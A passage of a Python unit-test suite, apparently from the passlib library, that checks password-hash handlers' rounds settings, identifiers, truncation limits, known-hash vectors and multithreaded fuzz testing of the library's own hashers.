self.assertEqual(parse('1000'), 1000)
# float bounds should be enforced
self.assertRaises(ValueError, parse, -0.1)
self.assertRaises(ValueError, parse, 1.1)
def test_has_rounds_using_w_vary_rounds_generation(self):
"""
HasRounds.using() -- vary_rounds generation
"""
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
def get_effective_range(cls):
seen = set(get_effective_rounds(cls) for _ in irange(1000))
return min(seen), max(seen)
def assert_rounds_range(vary_rounds, lower, upper):
temp = subcls.using(vary_rounds=vary_rounds)
seen_lower, seen_upper = get_effective_range(temp)
self.assertEqual(seen_lower, lower, "vary_rounds had wrong lower limit:")
self.assertEqual(seen_upper, upper, "vary_rounds had wrong upper limit:")
# test static
assert_rounds_range(0, medium, medium)
assert_rounds_range("0%", medium, medium)
# test absolute
assert_rounds_range(adj, medium - adj, medium + adj)
assert_rounds_range(50, max(small, medium - 50), min(large, medium + 50))
# test relative - should shift over at 50% mark
if handler.rounds_cost == "log2":
# log rounds "50%" variance should only increase/decrease by 1 cost value
assert_rounds_range("1%", medium, medium)
assert_rounds_range("49%", medium, medium)
assert_rounds_range("50%", medium - adj, medium)
else:
# for linear rounds, range is frequently so huge, won't ever see ends.
# so we just check it's within an expected range.
lower, upper = get_effective_range(subcls.using(vary_rounds="50%"))
self.assertGreaterEqual(lower, max(small, medium * 0.5))
self.assertLessEqual(lower, max(small, medium * 0.8))
self.assertGreaterEqual(upper, min(large, medium * 1.2))
self.assertLessEqual(upper, min(large, medium * 1.5))
def test_has_rounds_using_and_needs_update(self):
"""
HasRounds.using() -- desired_rounds + needs_update()
"""
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
temp = subcls.using(min_desired_rounds=small+2, max_desired_rounds=large-2)
# generate some sample hashes
small_hash = self.do_stub_encrypt(subcls, rounds=small)
medium_hash = self.do_stub_encrypt(subcls, rounds=medium)
large_hash = self.do_stub_encrypt(subcls, rounds=large)
# everything should be w/in bounds for original handler
self.assertFalse(subcls.needs_update(small_hash))
self.assertFalse(subcls.needs_update(medium_hash))
self.assertFalse(subcls.needs_update(large_hash))
# small & large should require update for temp handler
self.assertTrue(temp.needs_update(small_hash))
self.assertFalse(temp.needs_update(medium_hash))
self.assertTrue(temp.needs_update(large_hash))
#===================================================================
# idents
#===================================================================
def require_many_idents(self):
handler = self.handler
if not isinstance(handler, type) or not issubclass(handler, uh.HasManyIdents):
raise self.skipTest("handler doesn't derive from HasManyIdents")
def test_30_HasManyIdents(self):
"""validate HasManyIdents configuration"""
cls = self.handler
self.require_many_idents()
# check settings
self.assertTrue('ident' in cls.setting_kwds)
# check ident_values list
for value in cls.ident_values:
self.assertIsInstance(value, unicode,
"cls.ident_values must be unicode:")
self.assertTrue(len(cls.ident_values)>1,
"cls.ident_values must have 2+ elements:")
# check default_ident value
self.assertIsInstance(cls.default_ident, unicode,
"cls.default_ident must be unicode:")
self.assertTrue(cls.default_ident in cls.ident_values,
"cls.default_ident must specify member of cls.ident_values")
# check optional aliases list
if cls.ident_aliases:
for alias, ident in iteritems(cls.ident_aliases):
self.assertIsInstance(alias, unicode,
"cls.ident_aliases keys must be unicode:") # XXX: allow ints?
self.assertIsInstance(ident, unicode,
"cls.ident_aliases values must be unicode:")
self.assertTrue(ident in cls.ident_values,
"cls.ident_aliases must map to cls.ident_values members: %r" % (ident,))
# check constructor validates ident correctly.
handler = cls
hash = self.get_sample_hash()[1]
kwds = handler.parsehash(hash)
del kwds['ident']
# ... accepts good ident
handler(ident=cls.default_ident, **kwds)
# ... requires ident w/o defaults
self.assertRaises(TypeError, handler, **kwds)
# ... supplies default ident
handler(use_defaults=True, **kwds)
# ... rejects bad ident
self.assertRaises(ValueError, handler, ident='xXx', **kwds)
# TODO: check various supported idents
def test_has_many_idents_using(self):
"""HasManyIdents.using() -- 'default_ident' and 'ident' keywords"""
self.require_many_idents()
# pick alt ident to test with
handler = self.handler
orig_ident = handler.default_ident
for alt_ident in handler.ident_values:
if alt_ident != orig_ident:
break
else:
raise AssertionError("expected to find alternate ident: default=%r values=%r" %
(orig_ident, handler.ident_values))
def effective_ident(cls):
cls = unwrap_handler(cls)
return cls(use_defaults=True).ident
# keep default if nothing else specified
subcls = handler.using()
self.assertEqual(subcls.default_ident, orig_ident)
# accepts alt ident
subcls = handler.using(default_ident=alt_ident)
self.assertEqual(subcls.default_ident, alt_ident)
self.assertEqual(handler.default_ident, orig_ident)
# check subcls actually *generates* default ident,
# and that we didn't affect orig handler
self.assertEqual(effective_ident(subcls), alt_ident)
self.assertEqual(effective_ident(handler), orig_ident)
# rejects bad ident
self.assertRaises(ValueError, handler.using, default_ident='xXx')
# honor 'ident' alias
subcls = handler.using(ident=alt_ident)
self.assertEqual(subcls.default_ident, alt_ident)
self.assertEqual(handler.default_ident, orig_ident)
# forbid both at same time
self.assertRaises(TypeError, handler.using, default_ident=alt_ident, ident=alt_ident)
# check ident aliases are being honored
if handler.ident_aliases:
for alias, ident in handler.ident_aliases.items():
subcls = handler.using(ident=alias)
self.assertEqual(subcls.default_ident, ident, msg="alias %r:" % alias)
#===================================================================
# password size limits
#===================================================================
def test_truncate_error_setting(self):
"""
validate 'truncate_error' setting & related attributes
"""
# If it doesn't have truncate_size set,
# it shouldn't support truncate_error
hasher = self.handler
if hasher.truncate_size is None:
self.assertNotIn("truncate_error", hasher.setting_kwds)
return
# if hasher defaults to silently truncating,
# it MUST NOT use .truncate_verify_reject,
# because resulting hashes wouldn't verify!
if not hasher.truncate_error:
self.assertFalse(hasher.truncate_verify_reject)
# if hasher doesn't have configurable policy,
# it must throw error by default
if "truncate_error" not in hasher.setting_kwds:
self.assertTrue(hasher.truncate_error)
return
# test value parsing
def parse_value(value):
return hasher.using(truncate_error=value).truncate_error
self.assertEqual(parse_value(None), hasher.truncate_error)
self.assertEqual(parse_value(True), True)
self.assertEqual(parse_value("true"), True)
self.assertEqual(parse_value(False), False)
self.assertEqual(parse_value("false"), False)
self.assertRaises(ValueError, parse_value, "xxx")
def test_secret_wo_truncate_size(self):
"""
test no password size limits enforced (if truncate_size=None)
"""
# skip if hasher has a maximum password size
hasher = self.handler
if hasher.truncate_size is not None:
self.assertGreaterEqual(hasher.truncate_size, 1)
raise self.skipTest("truncate_size is set")
# NOTE: this doesn't do an exhaustive search to verify algorithm
# doesn't have some cutoff point, it just tries
# 1024-character string, and alters the last char.
# as long as algorithm doesn't clip secret at point <1024,
# the new secret shouldn't verify.
# hash a 1024-byte secret
secret = "too many secrets" * 16
alt = "x"
hash = self.do_encrypt(secret)
# check that verify doesn't silently reject secret
# (i.e. hasher mistakenly honors .truncate_verify_reject)
verify_success = not hasher.is_disabled
self.assertEqual(self.do_verify(secret, hash), verify_success,
msg="verify rejected correct secret")
# alter last byte, should get different hash, which won't verify
alt_secret = secret[:-1] + alt
self.assertFalse(self.do_verify(alt_secret, hash),
"full password not used in digest")
def test_secret_w_truncate_size(self):
"""
test password size limits raise truncate_error (if appropriate)
"""
#--------------------------------------------------
# check if test is applicable
#--------------------------------------------------
handler = self.handler
truncate_size = handler.truncate_size
if not truncate_size:
raise self.skipTest("truncate_size not set")
#--------------------------------------------------
# setup vars
#--------------------------------------------------
# try to get versions w/ and w/o truncate_error set.
# set to None if policy isn't configruable
size_error_type = exc.PasswordSizeError
if "truncate_error" in handler.setting_kwds:
without_error = handler.using(truncate_error=False)
with_error = handler.using(truncate_error=True)
size_error_type = exc.PasswordTruncateError
elif handler.truncate_error:
without_error = None
with_error = handler
else:
# NOTE: this mode is currently an error in test_truncate_error_setting()
without_error = handler
with_error = None
# create some test secrets
base = "too many secrets"
alt = "x" # char that's not in base, used to mutate test secrets
long_secret = repeat_string(base, truncate_size+1)
short_secret = long_secret[:-1]
alt_long_secret = long_secret[:-1] + alt
alt_short_secret = short_secret[:-1] + alt
# init flags
short_verify_success = not handler.is_disabled
long_verify_success = short_verify_success and \
not handler.truncate_verify_reject
#--------------------------------------------------
# do tests on <truncate_size> length secret, and resulting hash.
# should pass regardless of truncate_error policy.
#--------------------------------------------------
assert without_error or with_error
for cand_hasher in [without_error, with_error]:
# create & hash string that's exactly <truncate_size> chars.
short_hash = self.do_encrypt(short_secret, handler=cand_hasher)
# check hash verifies, regardless of .truncate_verify_reject
self.assertEqual(self.do_verify(short_secret, short_hash,
handler=cand_hasher),
short_verify_success)
# changing <truncate_size-1>'th char should invalidate hash
# if this fails, means (reported) truncate_size is too large.
self.assertFalse(self.do_verify(alt_short_secret, short_hash,
handler=with_error),
"truncate_size value is too large")
# verify should truncate long secret before comparing
# (unless truncate_verify_reject is set)
self.assertEqual(self.do_verify(long_secret, short_hash,
handler=cand_hasher),
long_verify_success)
#--------------------------------------------------
# do tests on <truncate_size+1> length secret,
# w/ truncate error disabled (should silently truncate)
#--------------------------------------------------
if without_error:
# create & hash string that's exactly truncate_size+1 chars
long_hash = self.do_encrypt(long_secret, handler=without_error)
# check verifies against secret (unless truncate_verify_reject=True)
self.assertEqual(self.do_verify(long_secret, long_hash,
handler=without_error),
short_verify_success)
# check mutating last char doesn't change outcome.
# if this fails, means (reported) truncate_size is too small.
self.assertEqual(self.do_verify(alt_long_secret, long_hash,
handler=without_error),
short_verify_success)
# check short_secret verifies against this hash
# if this fails, means (reported) truncate_size is too large.
self.assertTrue(self.do_verify(short_secret, long_hash,
handler=without_error))
#--------------------------------------------------
# do tests on <truncate_size+1> length secret,
# w/ truncate error
#--------------------------------------------------
if with_error:
# with errors enabled, should forbid truncation.
err = self.assertRaises(size_error_type, self.do_encrypt,
long_secret, handler=with_error)
self.assertEqual(err.max_size, truncate_size)
#===================================================================
# password contents
#===================================================================
def test_61_secret_case_sensitive(self):
"""test password case sensitivity"""
hash_insensitive = self.secret_case_insensitive is True
verify_insensitive = self.secret_case_insensitive in [True,
"verify-only"]
# test hashing lower-case verifies against lower & upper
lower = 'test'
upper = 'TEST'
h1 = self.do_encrypt(lower)
if verify_insensitive and not self.handler.is_disabled:
self.assertTrue(self.do_verify(upper, h1),
"verify() should not be case sensitive")
else:
self.assertFalse(self.do_verify(upper, h1),
"verify() should be case sensitive")
# test hashing upper-case verifies against lower & upper
h2 = self.do_encrypt(upper)
if verify_insensitive and not self.handler.is_disabled:
self.assertTrue(self.do_verify(lower, h2),
"verify() should not be case sensitive")
else:
self.assertFalse(self.do_verify(lower, h2),
"verify() should be case sensitive")
# test genhash
# XXX: 2.0: what about 'verify-only' hashes once genhash() is removed?
# won't have easy way to recreate w/ same config to see if hash differs.
# (though only hash this applies to is mssql2000)
h2 = self.do_genhash(upper, h1)
if hash_insensitive or (self.handler.is_disabled and not self.disabled_contains_salt):
self.assertEqual(h2, h1,
"genhash() should not be case sensitive")
else:
self.assertNotEqual(h2, h1,
"genhash() should be case sensitive")
def test_62_secret_border(self):
"""test non-string passwords are rejected"""
hash = self.get_sample_hash()[1]
# secret=None
self.assertRaises(TypeError, self.do_encrypt, None)
self.assertRaises(TypeError, self.do_genhash, None, hash)
self.assertRaises(TypeError, self.do_verify, None, hash)
# secret=int (picked as example of entirely wrong class)
self.assertRaises(TypeError, self.do_encrypt, 1)
self.assertRaises(TypeError, self.do_genhash, 1, hash)
self.assertRaises(TypeError, self.do_verify, 1, hash)
# xxx: move to password size limits section, above?
def test_63_large_secret(self):
"""test MAX_PASSWORD_SIZE is enforced"""
from passlib.exc import PasswordSizeError
from passlib.utils import MAX_PASSWORD_SIZE
secret = '.' * (1+MAX_PASSWORD_SIZE)
hash = self.get_sample_hash()[1]
err = self.assertRaises(PasswordSizeError, self.do_genhash, secret, hash)
self.assertEqual(err.max_size, MAX_PASSWORD_SIZE)
self.assertRaises(PasswordSizeError, self.do_encrypt, secret)
self.assertRaises(PasswordSizeError, self.do_verify, secret, hash)
def test_64_forbidden_chars(self):
"""test forbidden characters not allowed in password"""
chars = self.forbidden_characters
if not chars:
raise self.skipTest("none listed")
base = u('stub')
if isinstance(chars, bytes):
from passlib.utils.compat import iter_byte_chars
chars = iter_byte_chars(chars)
base = base.encode("ascii")
for c in chars:
self.assertRaises(ValueError, self.do_encrypt, base + c + base)
#===================================================================
# check identify(), verify(), genhash() against test vectors
#===================================================================
def is_secret_8bit(self, secret):
secret = self.populate_context(secret, {})
return not is_ascii_safe(secret)
def expect_os_crypt_failure(self, secret):
"""
check if we're expecting potential verify failure due to crypt.crypt() encoding limitation
"""
if PY3 and self.backend == "os_crypt" and isinstance(secret, bytes):
try:
secret.decode("utf-8")
except UnicodeDecodeError:
return True
return False
def test_70_hashes(self):
"""test known hashes"""
# sanity check
self.assertTrue(self.known_correct_hashes or self.known_correct_configs,
"test must set at least one of 'known_correct_hashes' "
"or 'known_correct_configs'")
# run through known secret/hash pairs
saw8bit = False
for secret, hash in self.iter_known_hashes():
if self.is_secret_8bit(secret):
saw8bit = True
# hash should be positively identified by handler
self.assertTrue(self.do_identify(hash),
"identify() failed to identify hash: %r" % (hash,))
# check if what we're about to do is expected to fail due to crypt.crypt() limitation.
expect_os_crypt_failure = self.expect_os_crypt_failure(secret)
try:
# secret should verify successfully against hash
self.check_verify(secret, hash, "verify() of known hash failed: "
"secret=%r, hash=%r" % (secret, hash))
# genhash() should reproduce same hash
result = self.do_genhash(secret, hash)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
if self.handler.is_disabled and self.disabled_contains_salt:
continue
self.assertEqual(result, hash, "genhash() failed to reproduce "
"known hash: secret=%r, hash=%r: result=%r" %
(secret, hash, result))
except MissingBackendError:
if not expect_os_crypt_failure:
raise
# would really like all handlers to have at least one 8-bit test vector
if not saw8bit:
warn("%s: no 8-bit secrets tested" % self.__class__)
def test_71_alternates(self):
"""test known alternate hashes"""
if not self.known_alternate_hashes:
raise self.skipTest("no alternate hashes provided")
for alt, secret, hash in self.known_alternate_hashes:
# hash should be positively identified by handler
self.assertTrue(self.do_identify(hash),
"identify() failed to identify alternate hash: %r" %
(hash,))
# secret should verify successfully against hash
self.check_verify(secret, alt, "verify() of known alternate hash "
"failed: secret=%r, hash=%r" % (secret, alt))
# genhash() should reproduce canonical hash
result = self.do_genhash(secret, alt)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
if self.handler.is_disabled and self.disabled_contains_salt:
continue
self.assertEqual(result, hash, "genhash() failed to normalize "
"known alternate hash: secret=%r, alt=%r, hash=%r: "
"result=%r" % (secret, alt, hash, result))
def test_72_configs(self):
"""test known config strings"""
# special-case handlers without settings
if not self.handler.setting_kwds:
self.assertFalse(self.known_correct_configs,
"handler should not have config strings")
raise self.skipTest("hash has no settings")
if not self.known_correct_configs:
# XXX: make this a requirement?
raise self.skipTest("no config strings provided")
# make sure config strings work (hashes in list tested in test_70)
if self.filter_config_warnings:
warnings.filterwarnings("ignore", category=PasslibHashWarning)
for config, secret, hash in self.known_correct_configs:
# config should be positively identified by handler
self.assertTrue(self.do_identify(config),
"identify() failed to identify known config string: %r" %
(config,))
# verify() should throw error for config strings.
self.assertRaises(ValueError, self.do_verify, secret, config,
__msg__="verify() failed to reject config string: %r" %
(config,))
# genhash() should reproduce hash from config.
result = self.do_genhash(secret, config)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
self.assertEqual(result, hash, "genhash() failed to reproduce "
"known hash from config: secret=%r, config=%r, hash=%r: "
"result=%r" % (secret, config, hash, result))
def test_73_unidentified(self):
"""test known unidentifiably-mangled strings"""
if not self.known_unidentified_hashes:
raise self.skipTest("no unidentified hashes provided")
for hash in self.known_unidentified_hashes:
# identify() should reject these
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified known unidentifiable "
"hash: %r" % (hash,))
# verify() should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for unidentifiable "
"hash: %r" % (hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for unidentifiable "
"hash: %r" % (hash,))
def test_74_malformed(self):
"""test known identifiable-but-malformed strings"""
if not self.known_malformed_hashes:
raise self.skipTest("no malformed hashes provided")
for hash in self.known_malformed_hashes:
# identify() should accept these
self.assertTrue(self.do_identify(hash),
"identify() failed to identify known malformed "
"hash: %r" % (hash,))
# verify() should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for malformed "
"hash: %r" % (hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for malformed "
"hash: %r" % (hash,))
def test_75_foreign(self):
"""test known foreign hashes"""
if self.accepts_all_hashes:
raise self.skipTest("not applicable")
if not self.known_other_hashes:
raise self.skipTest("no foreign hashes provided")
for name, hash in self.known_other_hashes:
# NOTE: most tests use default list of foreign hashes,
# so they may include ones belonging to that hash...
# hence the 'own' logic.
if name == self.handler.name:
# identify should accept these
self.assertTrue(self.do_identify(hash),
"identify() failed to identify known hash: %r" % (hash,))
# verify & genhash should NOT throw error
self.do_verify('stub', hash)
result = self.do_genhash('stub', hash)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
else:
# identify should reject these
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified hash belonging to "
"%s: %r" % (name, hash))
# verify should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for hash "
"belonging to %s: %r" % (name, hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for hash "
"belonging to %s: %r" % (name, hash))
def test_76_hash_border(self):
"""test non-string hashes are rejected"""
#
# test hash=None is handled correctly
#
self.assertRaises(TypeError, self.do_identify, None)
self.assertRaises(TypeError, self.do_verify, 'stub', None)
# NOTE: changed in 1.7 -- previously 'None' would be accepted when config strings not supported.
self.assertRaises(TypeError, self.do_genhash, 'stub', None)
#
# test hash=int is rejected (picked as example of entirely wrong type)
#
self.assertRaises(TypeError, self.do_identify, 1)
self.assertRaises(TypeError, self.do_verify, 'stub', 1)
self.assertRaises(TypeError, self.do_genhash, 'stub', 1)
#
# test hash='' is rejected for all but the plaintext hashes
#
for hash in [u(''), b'']:
if self.accepts_all_hashes:
# then it accepts empty string as well.
self.assertTrue(self.do_identify(hash))
self.do_verify('stub', hash)
result = self.do_genhash('stub', hash)
self.check_returned_native_str(result, "genhash")
else:
# otherwise it should reject them
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified empty hash")
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__="verify() failed to reject empty hash")
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__="genhash() failed to reject empty hash")
#
# test identify doesn't throw decoding errors on 8-bit input
#
self.do_identify('\xe2\x82\xac\xc2\xa5$') # utf-8
self.do_identify('abc\x91\x00') # non-utf8
#===================================================================
# fuzz testing
#===================================================================
def test_77_fuzz_input(self, threaded=False):
"""fuzz testing -- random passwords and options
This test attempts to perform some basic fuzz testing of the hash,
based on whatever information can be found about it.
It does as much as it can within a fixed amount of time
(defaults to 1 second, but can be overridden via $PASSLIB_TEST_FUZZ_TIME).
It tests the following:
* randomly generated passwords including extended unicode chars
* randomly selected rounds values (if rounds supported)
* randomly selected salt sizes (if salts supported)
* randomly selected identifiers (if multiple found)
* runs output of selected backend against other available backends
(if any) to detect errors occurring between different backends.
* runs output against other "external" verifiers such as OS crypt()
:param report_thread_state:
if true, writes state of loop to current_thread().passlib_fuzz_state.
used to help debug multi-threaded fuzz test issues (below)
"""
if self.handler.is_disabled:
raise self.skipTest("not applicable")
# gather info
from passlib.utils import tick
max_time = self.max_fuzz_time
if max_time <= 0:
raise self.skipTest("disabled by test mode")
verifiers = self.get_fuzz_verifiers(threaded=threaded)
def vname(v):
return (v.__doc__ or v.__name__).splitlines()[0]
# init rng -- using separate one for each thread
# so things are predictable for given RANDOM_TEST_SEED
# (relies on test_78_fuzz_threading() to give threads unique names)
if threaded:
thread_name = threading.current_thread().name
else:
thread_name = "fuzz test"
rng = self.getRandom(name=thread_name)
generator = self.FuzzHashGenerator(self, rng)
# do as many tests as possible for max_time seconds
log.debug("%s: %s: started; max_time=%r verifiers=%d (%s)",
self.descriptionPrefix, thread_name, max_time, len(verifiers),
", ".join(vname(v) for v in verifiers))
start = tick()
stop = start + max_time
count = 0
while tick() <= stop:
# generate random password & options
opts = generator.generate()
secret = opts['secret']
other = opts['other']
settings = opts['settings']
ctx = opts['context']
if ctx:
settings['context'] = ctx
# create new hash
hash = self.do_encrypt(secret, **settings)
##log.debug("fuzz test: hash=%r secret=%r other=%r",
## hash, secret, other)
# run through all verifiers we found.
for verify in verifiers:
name = vname(verify)
result = verify(secret, hash, **ctx)
if result == "skip": # let verifiers signal lack of support
continue
assert result is True or result is False
if not result:
raise self.failureException("failed to verify against %r verifier: "
"secret=%r config=%r hash=%r" %
(name, secret, settings, hash))
# occasionally check that some other secrets WON'T verify
# against this hash.
if rng.random() < .1:
result = verify(other, hash, **ctx)
if result and result != "skip":
raise self.failureException("was able to verify wrong "
"password using %s: wrong_secret=%r real_secret=%r "
"config=%r hash=%r" % (name, other, secret, settings, hash))
count += 1
log.debug("%s: %s: done; elapsed=%r count=%r",
self.descriptionPrefix, thread_name, tick() - start, count)
def test_78_fuzz_threading(self):
"""multithreaded fuzz testing -- random password & options using multiple threads
run test_77 simultaneously in multiple threads
in an attempt to detect any concurrency issues
(e.g. the bug fixed by pybcrypt 0.3)
"""
self.require_TEST_MODE("full")
import threading
# check if this test should run
if self.handler.is_disabled:
raise self.skipTest("not applicable")
thread_count = self.fuzz_thread_count
if thread_count < 1 or self.max_fuzz_time <= 0:
raise self.skipTest("disabled by test mode")
# buffer to hold errors thrown by threads
failed_lock = threading.Lock()
failed = [0]
# launch <thread count> threads, all of which run
# test_77_fuzz_input(), and see if any errors get thrown.
# if hash has concurrency issues, this should reveal it.
def wrapper():
try:
self.test_77_fuzz_input(threaded=True)
except SkipTest:
pass
except:
with failed_lock:
failed[0] += 1
raise
def launch(n):
name = "Fuzz-Thread-%d" % (n,)
thread = threading.Thread(target=wrapper, name=name)
thread.setDaemon(True)
thread.start()
return thread
threads = [launch(n) for n in irange(thread_count)]
# wait until all threads exit
timeout = self.max_fuzz_time * thread_count * 4
stalled = 0
for thread in threads:
thread.join(timeout)
if not thread.is_alive():
continue
# XXX: not sure why this is happening, main one seems 1/4 times for sun_md5_crypt
log.error("%s timed out after %f seconds", thread.name, timeout)
stalled += 1
# if any thread threw an error, raise one ourselves.
if failed[0]:
raise self.fail("%d/%d threads failed concurrent fuzz testing "
"(see error log for details)" % (failed[0], thread_count))
if stalled:
raise self.fail("%d/%d threads stalled during concurrent fuzz testing "
"(see error log for details)" % (stalled, thread_count))
#---------------------------------------------------------------
# fuzz constants & helpers
#---------------------------------------------------------------
@property
def max_fuzz_time(self):
"""amount of time to spend on fuzz testing"""
value = float(os.environ.get("PASSLIB_TEST_FUZZ_TIME") or 0)
if value:
return value
elif TEST_MODE(max="quick"):
return 0
elif TEST_MODE(max="default"):
return 1
else:
return 5
@property
def fuzz_thread_count(self):
"""number of threads for threaded fuzz testing"""
value = int(os.environ.get("PASSLIB_TEST_FUZZ_THREADS") or 0)
if value:
return value
elif TEST_MODE(max="quick"):
return 0
else:
return 10
#---------------------------------------------------------------
# fuzz verifiers
#---------------------------------------------------------------
#: list of custom fuzz-test verifiers (in addition to hasher itself,
#: and backend-specific wrappers of hasher). each element is
#: name of method that will return None / a verifier callable.
fuzz_verifiers = ("fuzz_verifier_default",)
def get_fuzz_verifiers(self, threaded=False):
"""return list of password verifiers (including external libs)
used by fuzz testing.
verifiers should be callable with signature
``func(password: unicode, hash: ascii str) -> ok: bool``.
"""
handler = self.handler
verifiers = []
# call all methods starting with prefix in order to create
for method_name in self.fuzz_verifiers:
func = getattr(self, method_name)()
if func is not None:
verifiers.append(func)
# create verifiers for any other available backends
# NOTE: skipping this under threading test,
# since backend switching isn't threadsafe (yet)
if hasattr(handler, "backends") and TEST_MODE("full") and not threaded:
def maker(backend):
def func(secret, hash):
orig_backend = handler.get_backend()
try:
handler.set_backend(backend)
return handler.verify(secret, hash)
finally:
handler.set_backend(orig_backend)
func.__name__ = "check_" + backend + "_backend"
func.__doc__ = backend + "-backend"
return func
for backend in iter_alt_backends(handler):
verifiers.append(maker(backend))
return verifiers
def fuzz_verifier_default(self):
# test against self
def check_default(secret, hash, **ctx):
return self.do_verify(secret, hash, **ctx)
if self.backend:
check_default.__doc__ = self.backend + "-backend"
else:
check_default.__doc__ = "self"
return check_default
#---------------------------------------------------------------
# fuzz settings generation
#---------------------------------------------------------------
class FuzzHashGenerator(object):
"""
helper which takes care of generating random
passwords & configuration options to test hash with.
separate from test class so we can create one per thread.
"""
#==========================================================
# class attrs
#==========================================================
# alphabet for randomly generated passwords
password_alphabet = u('qwertyASDF1234<>.@*#! \u00E1\u0259\u0411\u2113')
# encoding when testing bytes
password_encoding = "utf-8"
# map of setting kwd -> method name.
# will ignore setting if method returns None.
# subclasses should make copy of dict.
settings_map = dict(rounds="random_rounds",
salt_size="random_salt_size",
ident="random_ident")
# map of context kwd -> method name.
context_map = {}
#==========================================================
# init / generation
#==========================================================
def __init__(self, test, rng):
self.test = test
self.handler = test.handler
self.rng = rng
def generate(self):
"""
generate random password and options for fuzz testing.
:returns:
`(secret, other_secret, settings_kwds, context_kwds)`
"""
def gendict(map):
out = {}
for key, meth in map.items():
func = getattr(self, meth)
value = getattr(self, meth)()
if value is not None:
out[key] = value
return out
secret, other = self.random_password_pair()
return dict(secret=secret,
other=other,
settings=gendict(self.settings_map),
context=gendict(self.context_map),
)
#==========================================================
# helpers
#==========================================================
def randintgauss(self, lower, upper, mu, sigma):
"""generate random int w/ gauss distirbution"""
value = self.rng.normalvariate(mu, sigma)
return int(limit(value, lower, upper))
#==========================================================
# settings generation
#==========================================================
def random_rounds(self):
handler = self.handler
if not has_rounds_info(handler):
return None
default = handler.default_rounds or handler.min_rounds
lower = handler.min_rounds
if handler.rounds_cost == "log2":
upper = default
else:
upper = min(default*2, handler.max_rounds)
return self.randintgauss(lower, upper, default, default*.5)
def random_salt_size(self):
handler = self.handler
if not (has_salt_info(handler) and 'salt_size' in handler.setting_kwds):
return None
default = handler.default_salt_size
lower = handler.min_salt_size
upper = handler.max_salt_size or default*4
return self.randintgauss(lower, upper, default, default*.5)
def random_ident(self):
rng = self.rng
handler = self.handler
if 'ident' not in handler.setting_kwds or not hasattr(handler, "ident_values"):
return None
if rng.random() < .5:
return None
# resolve wrappers before reading values
handler = getattr(handler, "wrapped", handler)
return rng.choice(handler.ident_values)
#==========================================================
# fuzz password generation
#==========================================================
def random_password_pair(self):
"""generate random password, and non-matching alternate password"""
secret = self.random_password()
while True:
other = self.random_password()
if self.accept_password_pair(secret, other):
break
rng = self.rng
if rng.randint(0,1):
secret = secret.encode(self.password_encoding)
if rng.randint(0,1):
other = other.encode(self.password_encoding)
return secret, other
def random_password(self):
"""generate random passwords for fuzz testing"""
# occasionally try an empty password
rng = self.rng
if rng.random() < .0001:
return u('')
# check if truncate size needs to be considered
handler = self.handler
truncate_size = handler.truncate_error and handler.truncate_size
max_size = truncate_size or 999999
# pick endpoint
if max_size < 50 or rng.random() < .5:
# chance of small password (~15 chars)
size = self.randintgauss(1, min(max_size, 50), 15, 15)
else:
# otherwise large password (~70 chars)
size = self.randintgauss(50, min(max_size, 99), 70, 20)
# generate random password
result = getrandstr(rng, self.password_alphabet, size)
# trim ones that encode past truncate point.
if truncate_size and isinstance(result, unicode):
while len(result.encode("utf-8")) > truncate_size:
result = result[:-1]
return result
def accept_password_pair(self, secret, other):
"""verify fuzz pair contains different passwords"""
return secret != other
#==========================================================
# eoc FuzzGenerator
#==========================================================
#===================================================================
# "disabled hasher" api
#===================================================================
def test_disable_and_enable(self):
""".disable() / .enable() methods"""
#
# setup
#
handler = self.handler
if not handler.is_disabled:
self.assertFalse(hasattr(handler, "disable"))
self.assertFalse(hasattr(handler, "enable"))
self.assertFalse(self.disabled_contains_salt)
raise self.skipTest("not applicable")
#
# disable()
#
# w/o existing hash
disabled_default = handler.disable()
self.assertIsInstance(disabled_default, str,
msg="disable() must return native string")
self.assertTrue(handler.identify(disabled_default),
msg="identify() didn't recognize disable() result: %r" % (disabled_default))
# w/ existing hash
stub = self.getRandom().choice(self.known_other_hashes)[1]
disabled_stub = handler.disable(stub)
self.assertIsInstance(disabled_stub, str,
msg="disable() must return native string")
self.assertTrue(handler.identify(disabled_stub),
msg="identify() didn't recognize disable() result: %r" % (disabled_stub))
#
# enable()
#
# w/o original hash
self.assertRaisesRegex(ValueError, "cannot restore original hash",
handler.enable, disabled_default)
# w/ original hash
try:
result = handler.enable(disabled_stub)
error = None
except ValueError as e:
result = None
error = e
if error is None:
# if supports recovery, should have returned stub (e.g. unix_disabled);
self.assertIsInstance(result, str,
msg="enable() must return native string")
self.assertEqual(result, stub)
else:
# if doesn't, should have thrown appropriate error
self.assertIsInstance(error, ValueError)
self.assertRegex("cannot restore original hash", str(error))
#
# test repeating disable() & salting state
#
# repeating disabled
disabled_default2 = handler.disable()
if self.disabled_contains_salt:
# should return new salt for each call (e.g. django_disabled)
self.assertNotEqual(disabled_default2, disabled_default)
elif error is None:
# should return same result for each hash, but unique across hashes
self.assertEqual(disabled_default2, disabled_default)
# repeating same hash ...
disabled_stub2 = handler.disable(stub)
if self.disabled_contains_salt:
# ... should return different string (if salted)
self.assertNotEqual(disabled_stub2, disabled_stub)
else:
# ... should return same string
self.assertEqual(disabled_stub2, disabled_stub)
# using different hash ...
disabled_other = handler.disable(stub + 'xxx')
if self.disabled_contains_salt or error is None:
# ... should return different string (if salted or hash encoded)
self.assertNotEqual(disabled_other, disabled_stub)
else:
# ... should return same string
